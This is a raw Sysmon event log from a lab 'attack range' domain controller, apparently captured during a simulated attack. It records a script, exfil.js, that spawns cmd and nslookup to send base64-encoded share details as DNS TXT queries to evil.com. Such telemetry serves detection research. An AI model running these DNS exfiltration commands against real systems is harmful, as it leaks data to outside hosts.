C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F4-629A-D144-000000005F02}6336C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlszh.tmp 2>&1 354300x8000000000000000211864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.059{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50933- 354300x8000000000000000211863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.059{00000000-0000-0000-0000-000000000000}6372<unknown process>-udptruefalse127.0.0.1-50933-false127.0.0.1-53domain 354300x8000000000000000211862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.059{00000000-0000-0000-0000-000000000000}6372<unknown process>-udpfalsefalse127.0.0.1-50932-false127.0.0.1-53domain 354300x8000000000000000211861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.059{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50932- 354300x8000000000000000211860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.059{00000000-0000-0000-0000-000000000000}6372<unknown process>-udptruefalse127.0.0.1-50932-false127.0.0.1-53domain 354300x8000000000000000211859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.059{00000000-0000-0000-0000-000000000000}6372<unknown process>-udpfalsefalse127.0.0.1-50931-false127.0.0.1-53domain 354300x8000000000000000211858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.059{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50931- 354300x8000000000000000211857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.058{00000000-0000-0000-0000-000000000000}6372<unknown process>-udptruefalse127.0.0.1-50931-false127.0.0.1-53domain 354300x8000000000000000211856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.936{00000000-0000-0000-0000-000000000000}5836<unknown process>-udpfalsefalse127.0.0.1-50930-false127.0.0.1-53domain 354300x8000000000000000211855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.936{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50930- 354300x8000000000000000211854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.935{00000000-0000-0000-0000-000000000000}5836<unknown process>-udptruefalse127.0.0.1-50930-false127.0.0.1-53domain 354300x8000000000000000211853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.935{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50929- 354300x8000000000000000211852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.935{00000000-0000-0000-0000-000000000000}5836<unknown process>-udptruefalse127.0.0.1-50929-false127.0.0.1-53domain 354300x8000000000000000211851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.935{00000000-0000-0000-0000-000000000000}5836<unknown process>-udpfalsefalse127.0.0.1-50928-false127.0.0.1-53domain 354300x8000000000000000211850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.935{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50928- 354300x8000000000000000211849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.935{00000000-0000-0000-0000-000000000000}5836<unknown process>-udptruefalse127.0.0.1-50928-false127.0.0.1-53domain 354300x8000000000000000211848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.827{00000000-0000-0000-0000-000000000000}4284<unknown process>-udpfalsefalse127.0.0.1-50927-false127.0.0.1-53domain 354300x8000000000000000211847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.827{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50927- 354300x8000000000000000211846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.827{00000000-0000-0000-0000-000000000000}4284<unknown process>-udptruefalse127.0.0.1-50927-false127.0.0.1-53domain 354300x8000000000000000211845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.827{00000000-0000-0000-0000-000000000000}4284<unknown process>-udpfalsefalse127.0.0.1-50926-false127.0.0.1-53domain 354300x8000000000000000211844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.827{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50926- 354300x8000000000000000211843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.827{00000000-0000-0000-0000-000000000000}4284<unknown process>-udptruefalse127.0.0.1-50926-false127.0.0.1-53domain 354300x8000000000000000211842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.826{00000000-0000-0000-0000-000000000000}4284<unknown process>-udpfalsefalse127.0.0.1-50925-false127.0.0.1-53domain 354300x8000000000000000211841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.826{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50925- 354300x8000000000000000211840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.826{00000000-0000-0000-0000-000000000000}4284<unknown process>-udptruefalse127.0.0.1-50925-false127.0.0.1-53domain 354300x8000000000000000211839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.745{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56425-false10.0.1.12-8000- 354300x8000000000000000211838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.723{00000000-0000-0000-0000-000000000000}2812<unknown process>-udpfalsefalse127.0.0.1-50924-false127.0.0.1-53domain 10341000x8000000000000000211837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.333{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-D244-000000005F02}7736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.333{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-D244-000000005F02}7736C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.317{2E1864BB-18F4-629A-D244-000000005F02}77363388C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-D144-000000005F02}6336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.301{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-D244-000000005F02}7736C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.301{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.301{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.301{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.301{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.301{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-D144-000000005F02}6336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.301{2E1864BB-18E0-629A-6742-000000005F02}39765696C:\Windows\System32\WScript.exe{2E1864BB-18F4-629A-D144-000000005F02}6336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.303{2E1864BB-18F4-629A-D144-000000005F02}6336C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlszh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.286{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nliit.tmpMD5=8243B24CCFEB9BB233B3379BEC4F1A23,SHA256=640266002D96A03904AAA3A39C38EBB9E7EB5FB5F8774575491C759B17BE418A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.248{2E1864BB-18F4-629A-CF44-000000005F02}57767528C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-D044-000000005F02}7036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.248{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.248{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.248{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-D044-000000005F02}7036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.248{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.248{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.233{2E1864BB-18F4-629A-CE44-000000005F02}59567960C:\Windows\system32\cmd.exe{2E1864BB-18F4-629A-D044-000000005F02}7036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.247{2E1864BB-18F4-629A-D044-000000005F02}7036C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F4-629A-CE44-000000005F02}5956C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliit.tmp 2>&1 10341000x8000000000000000211817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.217{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-CF44-000000005F02}5776C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.217{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-CF44-000000005F02}5776C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.217{2E1864BB-18F4-629A-CF44-000000005F02}57767528C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-CE44-000000005F02}5956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.201{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-CF44-000000005F02}5776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 